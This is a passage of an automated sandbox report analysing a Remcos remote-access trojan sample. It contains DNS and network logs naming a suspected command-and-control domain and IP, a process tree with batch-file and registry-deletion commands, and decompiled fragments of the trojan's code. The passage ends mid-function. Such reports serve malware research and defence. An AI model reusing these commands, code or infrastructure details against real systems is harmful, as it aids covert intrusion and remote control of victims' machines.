Sep 16, 2021 07:31:02.077795029 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:30.998838902 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:31.026519060 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:31.875191927 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:31.935653925 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:34.007265091 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:34.045097113 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:43.441859007 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:43.579870939 CEST	53	55854	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:54.579904079 CEST	64549	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:54.610949993 CEST	53	64549	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:56.943455935 CEST	63153	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:57.056242943 CEST	53	63153	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:57.855884075 CEST	52991	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:57.934079885 CEST	53	52991	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:58.123680115 CEST	53700	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:58.157845974 CEST	53	53700	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:58.783854008 CEST	51726	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:58.818857908 CEST	53	51726	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:59.269623041 CEST	56794	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:59.296689034 CEST	53	56794	8.8.8.8	192.168.2.4
Sep 16, 2021 07:31:59.949897051 CEST	56534	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:31:59.991151094 CEST	53	56534	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:00.865252972 CEST	56627	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:00.895874977 CEST	53	56627	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:01.908340931 CEST	56621	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:01.935410976 CEST	53	56621	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:04.079628944 CEST	63116	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:04.137729883 CEST	53	63116	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:05.308572054 CEST	64078	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:05.341655970 CEST	53	64078	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:05.901374102 CEST	64801	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:05.929481030 CEST	53	64801	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:15.383393049 CEST	61721	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:15.409832954 CEST	53	61721	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:52.692359924 CEST	51255	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:52.736159086 CEST	53	51255	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:54.774735928 CEST	61522	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:54.801294088 CEST	53	61522	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:58.330287933 CEST	52337	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:58.356807947 CEST	53	52337	8.8.8.8	192.168.2.4
Sep 16, 2021 07:32:59.193892002 CEST	55046	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:32:59.251439095 CEST	53	55046	8.8.8.8	192.168.2.4
Sep 16, 2021 07:33:04.316589117 CEST	49612	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:33:04.359231949 CEST	53	49612	8.8.8.8	192.168.2.4
Sep 16, 2021 07:33:04.899002075 CEST	49285	53	192.168.2.4	8.8.8.8
Sep 16, 2021 07:33:04.927767038 CEST	53	49285	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 16, 2021 07:31:30.998838902 CEST	192.168.2.4	8.8.8.8	0xc325	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 16, 2021 07:31:31.875191927 CEST	192.168.2.4	8.8.8.8	0xf786	Standard query (0)	qclvzw.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 16, 2021 07:31:43.441859007 CEST	192.168.2.4	8.8.8.8	0x5f51	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 16, 2021 07:32:58.330287933 CEST	192.168.2.4	8.8.8.8	0xa29c	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 16, 2021 07:32:59.193892002 CEST	192.168.2.4	8.8.8.8	0x7c2f	Standard query (0)	qclvzw.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 16, 2021 07:33:04.316589117 CEST	192.168.2.4	8.8.8.8	0x5cf9	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 16, 2021 07:33:04.899002075 CEST	192.168.2.4	8.8.8.8	0x61fa	Standard query (0)	qclvzw.sn.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 16, 2021 07:31:31.026519060 CEST	8.8.8.8	192.168.2.4	0xc325	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:31:31.935653925 CEST	8.8.8.8	192.168.2.4	0xf786	No error (0)	qclvzw.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:31:31.935653925 CEST	8.8.8.8	192.168.2.4	0xf786	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:31:43.579870939 CEST	8.8.8.8	192.168.2.4	0x5f51	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 16, 2021 07:32:58.356807947 CEST	8.8.8.8	192.168.2.4	0xa29c	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:32:59.251439095 CEST	8.8.8.8	192.168.2.4	0x7c2f	No error (0)	qclvzw.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:32:59.251439095 CEST	8.8.8.8	192.168.2.4	0x7c2f	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:33:04.359231949 CEST	8.8.8.8	192.168.2.4	0x5cf9	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:33:04.927767038 CEST	8.8.8.8	192.168.2.4	0x61fa	No error (0)	qclvzw.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 16, 2021 07:33:04.927767038 CEST	8.8.8.8	192.168.2.4	0x61fa	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: IQl00lxPjo.exe PID: 5172 Parent PID: 6560

General

Start time:	07:31:06
Start date:	16/09/2021
Path:	C:\Users\user\Desktop\IQl00lxPjo.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\IQl00lxPjo.exe'
Imagebase:	0x400000
File size:	811520 bytes
MD5 hash:	9B8AE8EDFE553EDEA6108DCEEBCC57B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: DpiScaling.exe PID: 3980 Parent PID: 5172

General

Start time:	07:31:35
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\DpiScaling.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\DpiScaling.exe
Imagebase:	0xe50000
File size:	77312 bytes
MD5 hash:	302B1BBDBF4D96BEE99C6B45680CEB5E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6652 Parent PID: 5172

General

Start time:	07:31:43
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6488 Parent PID: 6652

General

Start time:	07:31:43
Start date:	16/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1844 Parent PID: 6652

General

Start time:	07:31:44
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5040 Parent PID: 1844

General

Start time:	07:31:44
Start date:	16/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4816 Parent PID: 5172

General

Start time:	07:31:44
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1280 Parent PID: 4816

General

Start time:	07:31:45
Start date:	16/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Dsqbhgvf.exe PID: 4984 Parent PID: 3424

General

Start time:	07:31:45
Start date:	16/09/2021
Path:	C:\Users\Public\Libraries\Dsqbhgvf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Dsqbhgvf.exe'
Imagebase:	0x400000
File size:	811520 bytes
MD5 hash:	9B8AE8EDFE553EDEA6108DCEEBCC57B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 32%, Virustotal, Browse
Reputation:	low

Chronological Activities

Analysis Process: reg.exe PID: 5736 Parent PID: 4816

General

Start time:	07:31:46
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg delete hkcu\Environment /v windir /f
Imagebase:	0x12b0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6316 Parent PID: 5736

General

Start time:	07:31:46
Start date:	16/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Dsqbhgvf.exe PID: 5388 Parent PID: 3424

General

Start time:	07:31:54
Start date:	16/09/2021
Path:	C:\Users\Public\Libraries\Dsqbhgvf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Dsqbhgvf.exe'
Imagebase:	0x400000
File size:	811520 bytes
MD5 hash:	9B8AE8EDFE553EDEA6108DCEEBCC57B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: dialer.exe PID: 7080 Parent PID: 4984

General

Start time:	07:33:04
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\dialer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0xf50000
File size:	32768 bytes
MD5 hash:	F176211F7372248224D02AC023573870
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: dialer.exe PID: 4176 Parent PID: 5388

General

Start time:	07:33:09
Start date:	16/09/2021
Path:	C:\Windows\SysWOW64\dialer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\dialer.exe
Imagebase:	0xf50000
File size:	32768 bytes
MD5 hash:	F176211F7372248224D02AC023573870
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: IQl00lxPjo.exe PID: 5172 Parent PID: 6560 IQl00lxPjo.exeCOMMON

Executed Functions

Non-executed Functions

Function 0230F0AC, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.669014139.000000000230C000.00000004.00000001.sdmp, Offset: 0230C000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112b845aaa59789d8d3785aa2ecc0b2cdba3a89ab765bc4be3e67aabbb604bb6
Instruction ID: 7dda19885c99708f9e306bdc16b2a97035d61d49d79f90f3e8bb7b5f86c882ae
Opcode Fuzzy Hash: 112b845aaa59789d8d3785aa2ecc0b2cdba3a89ab765bc4be3e67aabbb604bb6
Instruction Fuzzy Hash: 85E022F2B8050032F230A99C9CD2F8B914AC7C5769F194231F204EB6D1C9A8CC0656B8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DpiScaling.exe PID: 3980 Parent PID: 5172 DpiScaling.exeCOMMON

Executed Functions

Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CD09() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bb04 = _t24;
				return _t24;
			}

0x0040cd1c
0x0040cd25
0x0040cd2d
0x0040cd34
0x0040cd45
0x0040cd45
0x0040cd60
0x0040cd65
0x0040cd76
0x0040cd76
0x0040cd94
0x0040cda8
0x0040cdbc
0x0040cdd0
0x0040cde4
0x0040cdf8
0x0040ce0c
0x0040ce20
0x0040ce31
0x0040ce39
0x0040ce3d
0x0040ce43

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Sept-AITAB5,00000001,0040C505), ref: 0040CD1C
GetProcAddress.KERNEL32(00000000), ref: 0040CD25
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
GetProcAddress.KERNEL32(00000000), ref: 0040CD43
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
GetProcAddress.KERNEL32(00000000), ref: 0040CD57
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
GetProcAddress.KERNEL32(00000000), ref: 0040CD74
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
GetProcAddress.KERNEL32(00000000), ref: 0040CD88
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
GetProcAddress.KERNEL32(00000000), ref: 0040CE00
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
GetProcAddress.KERNEL32(00000000), ref: 0040CE14
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
GetProcAddress.KERNEL32(00000000), ref: 0040CE28
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
GetProcAddress.KERNEL32(00000000), ref: 0040CE39

Strings

user32, xrefs: 0040CDF3, 0040CE07, 0040CE1B
Shlwapi.dll, xrefs: 0040CE2C
EnumDisplayMonitors, xrefs: 0040CE02
Kernel32.dll, xrefs: 0040CD3B, 0040CD6C
Psapi.dll, xrefs: 0040CD17, 0040CD4F
GlobalMemoryStatusEx, xrefs: 0040CD8A
kernel32, xrefs: 0040CDA3, 0040CDB7, 0040CDDF
Shell32, xrefs: 0040CDCB
SetProcessDEPPolicy, xrefs: 0040CDDA
IsWow64Process, xrefs: 0040CD9E
NtUnmapViewOfSection, xrefs: 0040CD7B
ntdll.dll, xrefs: 0040CD80
GetModuleFileNameExW, xrefs: 0040CD4A, 0040CD67
GetMonitorInfoW, xrefs: 0040CE16
kernel32.dll, xrefs: 0040CD8F
EnumDisplayDevicesW, xrefs: 0040CDEE
GetComputerNameExW, xrefs: 0040CDB2
GetModuleFileNameExA, xrefs: 0040CD12, 0040CD36
Sept-AITAB5, xrefs: 0040CD10
IsUserAnAdmin, xrefs: 0040CDC6

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$Sept-AITAB5$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-280768746
Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00404E9A(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __edi;
				intOrPtr _t66;
				void* _t68;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x50)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t66 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x46bb03;
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_t50 = "%02i:%02i:%02i:%03i [Info] ";
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E0040482E(__eflags, E00401F95(E00405343(_t50,  &_v44, E00402084("%02i:%02i:%02i:%03i [Info] ",  &_v68, _t50), _t66, __eflags, "Connection KeepAlive enabled\n")), _v20.wHour & 0x0000ffff);
						E00401FC7();
						E00401FC7();
						_push(_t66);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E0040482E(__eflags, E00401F95(E00405343(_t50,  &_v68, E00402084(_t50,  &_v44, _t50), _t66, __eflags, "Connection KeepAlive timeout: %i\n")), _v20.wHour & 0x0000ffff);
						E00401FC7();
						E00401FC7();
					}
				} else {
					 *((char*)(__ecx + 0x64)) = 1;
				}
				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
				 *((char*)(_t68 + 0x50)) = 1;
				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, E0040518A, _t68, 0, 0); // executed
				return 1;
			}

0x00404ea2
0x00404ea9
0x00404fa2
0x00000000
0x00404fa2
0x00404eb3
0x00404eb6
0x00404ec1
0x00404ec8
0x00404ed2
0x00404edf
0x00404ee4
0x00404ee9
0x00404eee
0x00404f12
0x00404f1d
0x00404f25
0x00404f31
0x00404f32
0x00404f37
0x00404f3c
0x00404f60
0x00404f6b
0x00404f73
0x00404f73
0x00404eb8
0x00404eb8
0x00404eb8
0x00404f78
0x00404f81
0x00404f95
0x00404f98
0x00000000

APIs

GetLocalTime.KERNEL32(00000001,0046C238,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,004125B1), ref: 00404ED2
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C238,0046C780,00000000), ref: 00404F85
CreateThread.KERNELBASE(00000000,00000000,0040518A,?,00000000,00000000), ref: 00404F98

Strings

Connection KeepAlive timeout: %i, xrefs: 00404F42
Connection KeepAlive enabled, xrefs: 00404EF4
%02i:%02i:%02i:%03i [Info] , xrefs: 00404EE4, 00404EF9, 00404F47

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
API String ID: 2532271599-119634454
Opcode ID: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
Instruction ID: 5fa9d90cb8be4f3930b06c8b0122489401ffe22f77aad5cdb7e0e5ab13402fbc
Opcode Fuzzy Hash: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
Instruction Fuzzy Hash: 833194A1800255BACB10FBA6CC09DBFBBBCAF95709F04046FF941A21D2EA7C9945D764

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE

Sleep.KERNELBASE(00000BB8), ref: 0040D169
ExitProcess.KERNEL32 ref: 0040D1DE

Strings

3.2.1 Pro, xrefs: 0040D144, 0040D1B7
pth_unenc, xrefs: 0040D10E, 0040D181
override, xrefs: 0040D0D4

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.2.1 Pro$override$pth_unenc
API String ID: 2281282204-2083519672
Opcode ID: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
Opcode Fuzzy Hash: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F

Uniqueness

Uniqueness Score: -1.00%

Function 0042E5CA, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C

Uniqueness

Uniqueness Score: -1.00%

Function 105910CA, Relevance: 3.4, APIs: 2, Instructions: 379
memorylibraryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E105910CA(signed int __eax, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v60;
				intOrPtr* _v64;
				signed int* _v68;
				intOrPtr _v72;
